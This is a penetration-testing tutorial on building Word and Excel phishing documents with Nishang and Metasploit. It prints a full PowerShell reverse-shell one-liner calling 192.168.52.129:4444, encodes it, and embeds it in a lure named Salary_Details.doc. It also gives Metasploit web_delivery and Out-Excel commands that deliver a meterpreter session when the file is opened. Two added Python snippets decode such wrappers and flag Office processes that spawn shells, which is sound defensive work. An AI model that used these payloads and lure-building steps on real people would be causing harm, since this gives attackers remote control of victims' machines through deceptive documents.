Introduction
Windows PowerShell is a command-line shell for Microsoft Windows that is used for system administration. It uses cmdlets (commandlets) that are .NET classes to perform administrative tasks, and can access COM and WMI for local and remote administration. PowerShell can also be embedded within applications to make use of its abilities. PowerShell originated in 2006 when Monad (Microsoft Shell) was renamed to Windows PowerShell.
Making Microsoft Word phishing files
Download powercat (netshell features all in version 2 powershell)
Load powercat
PS G:\github\Pentest\powershell\powercat-master> . .\powercat.ps1
PS G:\github\Pentest\powershell\powercat-master> powercat
You must select either client mode (-c) or listen mode (-l).
After loading, use powercat to open a listener:
PS G:\github\Pentest\powershell\powercat-master> powercat -l -v -p 4444
Verbose: Set Stream 1: TCP
Verbose: Set Stream 2: Console
Verbose: Setting up Stream 1...
Verbose: Listening on [0.0.0.0] (port 4444)
To test, load Invoke-PowerShellTcp and execute it:
PS G:\github\Pentest\powershell\nishang-master\Shells> . .\Invoke-PowerShellTcp.ps1
PS G:\github\Pentest\powershell\nishang-master\Shells> Invoke-PowerShellTcp -Reverse -IPAddress 127.0.0.1 -Port 4444
You can see that the listener receives a PowerShell shell directly. Next, produce the Word file. Copy the client code from Nishang's Invoke-PowerShellTcpOneLine.ps1, as follows:
$client = New-Object System.Net.Sockets.TCPClient("192.168.52.129",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = (::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
Use Invoke-Encode.ps1 to encode it. Before encoding, remember to change the IP address and port to those of your own listener:
PS G:\github\Pentest\powershell\nishang-master\Shells> cd ..\Utility\
PS G:\github\Pentest\powershell\nishang-master\Utility> . .\Invoke-Encode.ps1
PS G:\github\Pentest\powershell\nishang-master\Utility> Invoke-Encode -DataToEncode '$client = New-Object System.Net.Sockets.TCPClient("192.1
68.52.129",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$da
ta = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendb
ack + "PS " + (pwd).Path + "> ";$sendbyte = (::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream
.Flush()};$client.Close()' -IsString -PostScriptCommand
Encoded data written to .\encoded.txt
Encoded command written to .\encodedcommand.txt
Copy the encoded command, which looks as follows:
Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String('<Base64 payload omitted>')))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();
Load Out-Word.ps1 and generate the backdoored document. Note that the payload is passed inside single quotation marks, so every single quotation mark inside the payload must be doubled!
PS G:\github\Pentest\powershell\nishang-master\Utility> . ..\Client\Out-Word.ps1
PS G:\github\Pentest\powershell\nishang-master\Utility> Out-Word -Payload 'powershell -c Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(''<Base64 payload omitted>'')))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();'
Saved to file G:\github\Pentest\powershell\nishang-master\Utility\Salary_Details.doc
0
PS G:\github\Pentest\powershell\nishang-master\Utility>
When the Word file is opened, it connects back with a shell.
The resulting PowerShell shell can easily be upgraded to a Metasploit meterpreter session.
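For analysts who find a command line in the Invoke-Encode wrapper format shown above (Base64 around a raw Deflate stream), the following added example, which is not part of the original page or of Nishang, recovers the plaintext script for review. The function names and the benign sample are constructed for illustration.

```python
import base64
import re
import zlib

# Wrapper shape taken from the Invoke-Encode output shown on this page:
# FromBase64String('<blob>') fed into a DeflateStream in Decompress mode.
# One or two quotes are accepted because Out-Word payloads double them.
B64_ARG = re.compile(r"FromBase64String\(\s*'{1,2}([A-Za-z0-9+/=\s]+)'{1,2}\s*\)")


def decode_wrapped_commands(command_line, max_out=1_000_000):
    """Return the plaintext hidden in every Base64+Deflate wrapper found."""
    results = []
    for match in B64_ARG.finditer(command_line):
        try:
            raw = base64.b64decode(match.group(1), validate=False)
            # .NET DeflateStream emits raw DEFLATE (no zlib header): wbits=-15.
            # max_out caps the inflated size to blunt decompression bombs.
            plain = zlib.decompressobj(-15).decompress(raw, max_out)
        except (ValueError, zlib.error):
            continue  # not this encoding; leave it for other decoders
        if plain:
            results.append(plain.decode("ascii", errors="replace"))
    return results


def make_constructed_sample(script):
    """Build a benign test input in the same wrapper format (constructed)."""
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)
    blob = base64.b64encode(comp.compress(script.encode("ascii")) + comp.flush())
    return (
        "powershell -c Invoke-Expression $(New-Object IO.StreamReader ($(New-Object "
        "IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::"
        "FromBase64String(''" + blob.decode() + "'')))), [IO.Compression."
        "CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();"
    )


SAMPLE = make_constructed_sample('Write-Output "constructed benign sample"')

if __name__ == "__main__":
    for text in decode_wrapped_commands(SAMPLE):
        print(text)
```

The decoder only inflates and prints the script; it never executes it, so it is safe to run on a triage workstation.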
Making Microsoft Excel phishing files
First, use the msf web_delivery module to open a PowerShell listener:
msf > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set target 2
target => 2
msf exploit(web_delivery) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(web_delivery) > set LHOST 192.168.52.129
LHOST => 192.168.52.129
msf exploit(web_delivery) > set URIPATH /
URIPATH =>
msf exploit(web_delivery) > exploit
Use Out-Excel.ps1 to make the Excel phishing file:
PS D:\temp> . .\Out-Excel.ps1
PS D:\temp> Out-Excel -PayloadURL http://192.168.52.129:8080/ -OutputFile D:\temp\test.xls
Saved to file D:\temp\test.xls
http://192.168.52.129:8080 is the address of the service opened by msf. Open the Excel file to get the meterpreter session, as shown below:
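On the detection side, both documents on this page end with an Office application starting PowerShell. The following added example, which is not from the original page or from Nishang or Metasploit, triages process-creation events for that lineage and grades them by command-line traits. The event schema, field order and sample events are constructed, and it assumes the shell runs as a direct child of the Office process.

```python
import re

# Assumed normalised fields (hypothetical) from process-creation telemetry
# such as Sysmon Event ID 1: (parent image, child image, command line).
OFFICE_PARENTS = {"winword.exe", "excel.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}

# Command-line traits of the two payload styles described on this page.
TRAITS = {
    "base64_deflate_wrapper": re.compile(
        r"(?=.*FromBase64String)(?=.*DeflateStream)", re.I | re.S),
    "dynamic_eval": re.compile(r"\b(?:Invoke-Expression|iex)\b", re.I),
    "raw_tcp_client": re.compile(r"Net\.Sockets\.TCPClient", re.I),
    "remote_url": re.compile(r"https?://", re.I),
}

WORD = r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE"
EXCEL = r"C:\Program Files\Microsoft Office\Office16\EXCEL.EXE"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed sample events; blobs and fetch code are elided placeholders.
EVENTS = [
    (WORD, PS, "powershell -c Invoke-Expression $(New-Object IO.StreamReader ($("
               "New-Object IO.Compression.DeflateStream (... FromBase64String("
               "'<blob elided>') ...))).ReadToEnd();"),
    (EXCEL, PS, 'powershell.exe -c "iex (<fetch of http://192.0.2.10:8080/ elided>)"'),
    (WORD, r"C:\Windows\System32\cmd.exe", "cmd.exe /c dir"),
    (EXCEL, r"C:\Windows\splwow64.exe", "splwow64.exe 8192"),
    (r"C:\Windows\explorer.exe", PS, "powershell.exe Get-ChildItem"),
]


def basename(path):
    return re.split(r"[\\/]", path)[-1].lower()


def triage(events):
    """Alert on Office applications spawning a shell; grade by command line."""
    alerts = []
    for parent, image, cmdline in events:
        parent, image = basename(parent), basename(image)
        if parent in OFFICE_PARENTS and image in SHELLS:
            traits = sorted(n for n, rx in TRAITS.items() if rx.search(cmdline))
            alerts.append({"parent": parent, "child": image, "traits": traits,
                           "severity": "high" if traits else "medium"})
    return alerts


if __name__ == "__main__":
    for alert in triage(EVENTS):
        print(alert)
```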